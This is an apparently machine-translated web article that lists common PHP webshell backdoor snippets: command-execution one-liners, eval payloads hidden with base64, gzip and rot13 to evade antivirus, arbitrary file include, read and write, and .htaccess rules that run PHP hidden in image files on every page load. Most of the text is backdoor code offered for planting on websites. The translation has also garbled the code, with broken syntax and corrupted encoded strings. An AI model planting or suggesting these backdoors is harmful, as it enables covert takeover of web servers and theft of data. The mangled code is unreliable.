Analysis of Common php backdoor Trojan commands

Php webshell Trojans are no stranger to everyone, but what types do you know about them?
 
Common functions of php Backdoor trojans can be divided into four types:
 
1. execute system commands: system, passthru, shell_exec, exec, popen, proc_open
 
2. Code Execution and encryption: eval, assert, call_user_func, base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
 
3. File Inclusion and generation: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
 
4. htaccess: SetHandler, auto_prepend_file, auto_append_file
 
1. Execute the system command:
 
System Functions
 
// Test. php? Cmd = ls
 
System ($ _ GET [cmd]);
 
Passthru Function
 
// Test. php? Cmd = ls
 
Passthru ($ _ GET [cmd]);
 
Shell_exec Function
 
// Test. php? Cmd = ls
 
Echo shell_exec ($ _ GET [cmd]);
 
Exec Function
 
// Test. php? Cmd = ls
 
$ Arr = array ();
 
Exec ($ _ GET [cmd], $ arr );
 
Print_r ($ arr );
 
Popen Function
 
// Test. php? Cmd = ls
 
$ Handle = popen ('$ _ GET [cmd], 'R ');
 
$ Read = fread ($ handle, 2096 );
 
Echo $ read;
 
Pclose ($ handle );
 
Proc_open Function
 
// Test. php? Cmd = ls
 
$ Descriptorspec = array (
 
0 => array ('pipe', 'R '),
 
1 => array ('pipe', 'w '),
 
2 => array ('pipe', 'w '),
 
);
 
$ Proc = @ proc_open ($ _ GET [cmd], $ descriptorspec, $ pipes );
 
Fclose ($ pipes [0]);
 
$ Output = array ();
 
While (! Feof ($ pipes [1]) array_push ($ output, rtrim (fgets ($ pipeline [1], 1024), "\ n "));
 
Print_r ($ output );
 
2. Code Execution and encryption:
 
Eval function
 
// The most common Trojan
 
Eval ($ _ POST [cmd]);
 
Base64_decode Function
 
// Encrypt the code for no-kill and hide
 
// Ciphertext: eval ($ _ POST ['cmd']);
 
Eval (base64_decode ('zxzhbcgkx1bpu1rbj2ntzcddkts = '));
 
Gzinflate Function
 
// Encrypt the code for no-kill and hide
 
// Ciphertext: eval ($ _ POST ['cmd']);
 
Eval (gzinflate (base64_decode ('sy1lznfqiq/wDw6JVk/OTVGP1bQGAA = ')));
 
Gzuncompress Function
 
// Encrypt the code for no-kill and hide
 
// Ciphertext: eval ($ _ POST ['cmd']);
 
Eval (gzuncompress (base64_decode ('ejxlluvm0vcjd/APDolWT85NUY/VtAYARQUGOA = ')));
 
Gzdecode Function
 
// Encrypt the code for no-kill and hide
 
// Ciphertext: eval ($ _ POST ['cmd']);
 
Eval (gzdecode (base64_decode ('h4siaaaaaaaaa0sts8zruikp8a8oivzpzk14259w0bga5yqfaaaaa = ')));
 
Str_rot13 Function
 
// Encrypt the code for no-kill and hide
 
// Ciphertext: eval ($ _ POST [cmd]);
 
Eval (str_rot13 ('riny ($ _ CBFG [pzq]); ');
 
Assert Function
 
// Similar to eval Functions
 
Assert ($ _ POST [cmd]);
 
Call_user_func Function
 
// Call assert using call_user_func
 
Call_user_func ('assert ', $ _ POST [cmd]);
 
Call_user_func Function
 
// Call any function using call_user_func
 
// Test. php? A = assert & cmd = phpinfo ()
 
Call_user_func ($ _ GET [a], $ _ REQUEST [cmd]);
 
Combined Code
 
// Call any function in combination
 
// Test. php? A = assert & cmd = phpinfo ()
 
$ _ GET [a] ($ _ REQUEST [cmd]);
 
3. File Inclusion and generation:
 
Require Function
 
// Contains any file
 
// Test. php? File112123.jpg
 
Require ($ _ GET [file]);
 
Require_once Function
 
// Contains any file
 
// Test. php? File112123.jpg
 
Require_once ($ _ GET [file]);
 
Include Function
 
// Contains any file www.2cto.com
 
// Test. php? File112123.jpg
 
Include ($ _ GET [file]);
 
Include_once Function
 
// Contains any file
 
// Test. php? File112123.jpg
 
Include_once ($ _ GET [file]);
 
File_get_contents Function
 
// Read any file
 
// Test. php? F = config. inc. php
 
Echo file_get_contents ($ _ GET ['F']);
 
File_put_contents Function
 
// Generate any Content File
 
// A = test. php & B = <? Php eval ($ _ POST [cmd]);?>
 
File_put_contents ($ _ GET [a], $ _ GET [B]);
 
Fputs Function
 
// Generate any Content File
 
// A = test. php & B = <? Php eval ($ _ POST [cmd]);?>
 
Fputs (fopen ($ _ GET [a], "w"), $ _ GET [B]);
 
4. htaccess:
 
SetHandler
 
// Save the php code to a non-php suffix file, for example, x.jpg.
 
// Write the following code into. htaccess
 
// Connect x.jpg to start the backdoor Trojan
 
<FilesMatch "x.jpg">
 
SetHandler application/x-httpd-php
 
</FilesMatch>
 
Auto_prepend_file
 
// You can save the php code in a non-php suffix file, for example, 123.gif.
 
// Write the following code to. htaccess. The file path must be an absolute path.
 
// Access any php file on the website and start the php backdoor Trojan.
 
// You can record all $ _ REQUEST values without changing the site source code, or batch Mount Trojans.
 
Php_value auto_prepend_file c:/apache2/htdocs/123.gif
 
Auto_append_file
 
// Similar to auto_prepend_file
 
// You can save the php code in a non-php suffix file, for example, 123.gif.
 
// Write the following code to. htaccess. The file path must be an absolute path.
 
// Access any php file on the website and start the php backdoor Trojan.
 
Php_value auto_append_file c:/apache2/htdocs/123.gif